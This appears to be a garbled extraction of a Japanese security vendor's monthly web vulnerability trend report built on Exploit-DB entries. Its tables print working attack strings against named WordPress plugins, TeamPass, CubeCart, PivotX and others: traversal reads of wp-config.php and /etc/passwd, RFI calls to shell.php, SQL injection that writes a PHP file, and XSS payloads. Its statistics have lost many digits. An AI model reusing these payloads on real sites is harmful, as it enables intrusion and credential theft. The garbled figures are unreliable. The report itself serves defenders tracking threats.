最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

Size: px

Start display at page:

Download "最新 Web トレンドレポート (06.03) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3"

みいかよしなが
7 years ago
Views:

1 06.03

2 最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3 月に公開された Exploit-DB の分析結果 Local File Inclusion 攻撃に対する報告数が最も多かったです Local File Inclusion 攻撃は主に Directory Traversal 攻撃と共に行われる攻撃として対象ファイルが攻撃対象サーバーに位置しているとき発生します Local File Inclusion 攻撃はパラメーター値の経路を単純操作する形態の簡単な攻撃です当該攻撃はシステムファイルがユーザに露出される被害を起こすため難易度に比べて危険度が高いです Local File Inclusion 攻撃を予防するための最も良い方法はソースコードを安全に修正することですしかしサイトの規模が大きくて該当サーバーのすべての入力値を検証しにくい状況なら Web アプリケーションファイアウォールを導入するのが現実的に適切な方法です主なソフトウェア別発生現状から見れば Open Source CMS として広く知られているで最も多いが報告されました分析されたは自体のというよりは主に新規 Plugin のでしたを使用する管理者は使用中の Plguin のセキュリティパッチを実施してサーバーがにさらされないように注意しなければなりません. 別件数カテゴリコードインジェクション (Code Injection) ファイルアップロード (File Upload) SQL インジェクション (SQL Injection) RFIリモートファイル挿入 (Remote File Inclusion:RFI) クロスサイトスクリプティング (Cross Site Scripting : XSS) 件数ローカルファイル挿入 (Local File Inclusion:LFI) 3 合計 33 別件数危険度別件数危険度件数割合早急対応要 6 8% 高 7 8% 合計 33 00% 危険度別分類 6 早急対応要高 7 3. 攻撃実行の難易度別件数難易度件数割合難 3 9% 中 3 9% 易 7 8% 合計 33 00% 攻撃実行の難易度別件数難中易 4. 主なソフトウェア別発生件数ソフトウェア名 PivotX TeamPass ProjectSend CubeCart Liferay Portal itop Zenphoto Joomla Monstra 合計件数 0 33 主なソフトウェア別発生件数 0 PivotX TeamPass ProjectSend CubeCart Liferay Portal itop Zenphoto Joomla Monstra Copyright 06 Penta Security Systems Inc. All rights reserved

3 最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するかあるいはクライアントに次被害を及ぼす中 : 情報漏洩攻撃実行難易度分類基準難 : 複数のを突いた攻撃パターン対象のシステムの重要な情報を取得するため高度な攻撃コードを採用したパターン知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン複数回トライするも既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別の詳細情報 EDB 番号カテゴリ攻撃難易度危険度名ソフトウェア名 3953 File Upload 易高 CP Polls Plugin admin.php XSS XSS 易高 Best Web Soft Captcha Plugin <= admin.php XSS () XSS 易高 WP Advanced Comment Plugin / XSS XSS 易高 Best Web Soft Captcha Plugin <= admin.php XSS XSS 易高 DZS Videogallery Plugin <= popup.php XSS XSS 易高 DZS Videogallery Plugin <= ajax.php XSS LFI 易高 Site Import Plugin.0. - page.php LFI RFI 易早急対応要 Site Import Plugin.0. - page.php RFI LFI 易高 Image Export Plugin..0 - download.php LFI LFI 易高 Abtest Plugin - abtest_admin.php LFI LFI 易高 ebook Download Plugin. - filedownload.php LFI LFI 易高 Memphis Document Library Plugin / LFI LFI 易高 Memphis Document Library Plugin /mdocsposts/ LFI 3959 LFI 易高 Dharma booking Plugin proccess.php LFI 3959 RFI 易高 Dharma booking Plugin proccess.php RFI 3959 LFI 易高 Brandfolder Plugin callback.php LFI 3959 RFI 易高 Brandfolder Plugin callback.php RFI LFI 易高 HB Audio Gallery Lite Plugin audiodownload.php LFI 3963 LFI 易高 Photocart Link Plugin.6 - decode.php LFI 396 LFI 易高 Plugin IMDb Profile Widget pic.php LFI Copyright 06 Penta Security Systems Inc. All rights reserved

4 最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 File Upload 易高 POST /wpadmin/admin.php?page=cp_polls&cal=&list=&import= HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT CP Polls Plugin CP Polls 6.; WOW64; Trident/6.0) admin.php XSS Plugin.0.8 Content-Type: multipart/form-data; boundary= dd009908f dd009908f Content-Disposition: form-data; name="importfile"; filename="csv.csv" Content-Type: application/octet-stream XSS 易高 Best Web Soft Captcha /wpadmin/admin.php?page=captcha.php&action=whitelist&s=%3 Plugin <= admin.php XSS () Cscript%3Ealert%8%9%3B%3C%Fscript%3E Best Web Soft Captcha Plugin <= XSS 易高 WP Advanced Comment Plugin / XSS POST / HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) WP Advanced Comment Plugin XSS 易高 POST /wpadmin/admin.php?page=captcha.php&action=whitelist HTTP/. Best Web Soft Captcha AppleWebKit/535.7 KHTML, like Gecko Chrome/ Plugin <= admin.php XSS 脆弱性 Best Web Soft Captcha Plugin <= 4.. s=<script>alert();</script>&search IP=Click here to claim your prize! XSS 易高 DZS Videogallery Plugin <= popup.php XSS /wp-content/plugins/dzsvideogallery/admin/playlistseditor/popup.php?initer=whatava 864%7%3balert%8%9%f%f645 DZS Videogallery Plugin <= XSS 易高 DZS Videogallery Plugin <= ajax.php XSS /wp-content/plugins/dzsvideogallery/ajax.php?height=&source=6d7f"><script>alert() <%fscript>894ba&type=&width= DZS Videogallery Plugin <= LFI 易高 Site Import Plugin.0. - page.php LFI /wp-content/plugins/siteimport/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini Site Import Plugin RFI 易早急対応要 Site Import Plugin.0. - page.php RFI /wp-content/plugins/siteimport/admin/page.php?url=http%3a%f%flocalhost%fsh ell.php?shell=ls Site Import Plugin.0. Copyright 06 Penta Security Systems Inc. All rights reserved

5 最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 SQL Injection 難早急対応要 TeamPass..4 - item.query.php SQL Injection POST /source/item.query.php HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/ TeamPass TeamPass SQL Injection 難早急対応要 TeamPass..4 - view.query.php SQL Injection type=action_on_quick_icon&id=(select (CASE WHEN (644=644) THEN 644 ELSE 644*(SELECT 644 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action= POST /source/view.query.php HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/ TeamPass TeamPass.. type=connections_logs&order=(select (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC POST /monstra-3.0.3/users/8/edit HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/ XSS 易高 Monstra CMS /monstra /users/8/edit XSS csrf=685bba70d44b8b877937b56f5b87e66935fe&user_i d=8&login=user&firstname=%%3e%3cscript%3ealert%8 %9%3B%3C%Fscript%3E&lastname=%%3E%3Cscrip t%3ealert%8%9%3b%3c%fscript%3e& =%% 3E%3Cscript%3Ealert%8%9%3B%3C%Fscript%3E&tw itter=%%3e%3cscript%3ealert%8%9%3b%3c%fsc ript%3e&skype=%%3e%3cscript%3ealert%8%9%3b %3C%Fscript%3E&about_me=%%3E%3Cscript%3Ealert %8%9%3B%3C%Fscript%3E&new_password=&edit_pr ofile=save Monstra Monstra CMS RFI 易高 Zenphoto.4. - admin-logs.php RFI /zp-core/adminlogs.php?action=download_log&page=logs&tab= st/shell.php%3f%78%3d%69%64%6%66%6f%6f%3d&fil ename=security&xsrftoken=afd5bafed79d837486fdbee a8f87bc9dea Zenphoto Zenphoto LFI 中高 PivotX.3. - index.php LFI /pivotx_latest/pivotx/index.php?page=media&del=...//...//.../ /...//...//...//...//...//...//...//...//...//important/important.file &pivotxsession=ovyyn4objc5ym9 PivotX PivotX LFI 中早急対応要 PivotX.3. - ajaxhelper.php LFI /pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=l 3Zhci93d3cvcGlb3R4XxhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//...//...//...//...//...//...//...//...//...//...//etc/passwd PivotX PivotX XSS 易高 XSS 易高 Code Injection 中早急対応要 ProjectSend r58 - index.php XSS ProjectSend r58 - clients.php XSS itop.. - config.php Code Injection POST /my_files/index.php HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/ POST /clients.php HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/ POST /env-production/itopconfig/config.php?c%5bmenu%5d=configeditor HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/ ProjectSend ProjectSend r58 ProjectSend ProjectSend r58 itop itop.. Copyright 06 Penta Security Systems Inc. All rights reserved

6 最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 LFI 易高 Image Export Plugin..0 - download.php LFI /wp-content/plugins/imageexport/download.php?file=../../../wp-config.php Image Export Plugin LFI 易高 Abtest Plugin - abtest_admin.php LFI /wpcontent/plugins/abtest/abtest_admin.php?action=../../etc/pass wd Abtest Plugin LFI 易高 ebook Download Plugin. - filedownload.php LFI /wp-content/plugins/ebookdownload/filedownload.php?ebookdownloadurl=../../../wpconfig.php ebook Download Plugin LFI 易高 Memphis Document Library Plugin / LFI /?mdocs-img-preview=../../../wp-config.php Memphis Document Library Plugin LFI 易高 Memphis Document Library Plugin /mdocs-posts/ /mdocs-posts/?mdocs-img-preview=../../../wp-config.php LFI Memphis Document Library Plugin LFI 易高 Dharma booking Plugin proccess.php LFI /wp/dharmabooking/frontend/ajax/gateways/proccess.php?gateway=../../.. /../../../etc/passwd%00 Dharma booking Plugin RFI 易高 Dharma booking Plugin proccess.php RFI /wp/dharmabooking/frontend/ajax/gateways/proccess.php?gateway= / Dharma booking Plugin LFI 易高 Brandfolder Plugin callback.php LFI /wp/wpcontent/plugins/brandfolder/callback.php?wp_abspath=../../../ wp-config.php%00 Brandfolder Plugin RFI 易高 Brandfolder Plugin callback.php RFI /wp/wpcontent/plugins/brandfolder/callback.php?wp_abspath= Brandfolder Plugin SQL Injection 易高 LFI 易高 Joomla Easy Youtube Gallery.0. - index.php SQL Injection /index.php?option=com_easy_youtube_gallery&view=videos& mycategory=0%7%0or%0%7%7=%7%7&defaul tvideo=9&itemid=75 HB Audio Gallery Lite /wp-content/plugins/hb-audio-gallery-lite/gallery/audiodownload.php?file_path=../../../../wp-config.php&file_size=0 Plugin audio-download.php LFI Joomla Joomla Easy Youtube Gallery.0. HB Audio Gallery Lite Plugin.0.0 Copyright 06 Penta Security Systems Inc. All rights reserved

7 最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 LFI 易高 Photocart Link Plugin.6 - decode.php LFI /wp-content/plugins/photocartlink/decode.php?id=li4vli4vli4vd3aty9uzmlnlnboca== Photocart Link Plugin LFI 易高 XSS 易高 SQL Injection 難早急対応要 XSS 易高 Plugin IMDb Profile Widget pic.php LFI Liferay Portal /user/test/home XSS CubeCart admin.php SQL Injection CubeCart index.php XSS /wp-content/plugins/imdb-widget/pic.php?url=../../../wpconfig.php POST /user/test/home?p_p_id=79&p_p_lifecycle=&p_p_state=maxi mized&p_p_mode=view&_79_struts_action=%fenterprise_ad min%fedit_user HTTP/. /admin.php?_g=products&cat_id=&sort[updated]=desc&cha r=t]%7%0union%0select%0,,3,4,5,6,7,8,9,'<? phpinfo();?>',,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8%0i NTO%0OUT FILE%0'/var/www/site/file.php'%0--%0 POST /index.php?_a=profile HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/ first_name=" onmouseover="javascript:alert(/immuniweb/);" Plugin IMDb Profile Widget.0.8 Liferay Portal Liferay Portal 5.. CubeCart CubeCart CubeCart CubeCart Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 06.0 最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年月に公開された Exploit-DB の分析の結果 SQL Injection 攻撃に対する脆弱性報告数が最も多かったです

最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3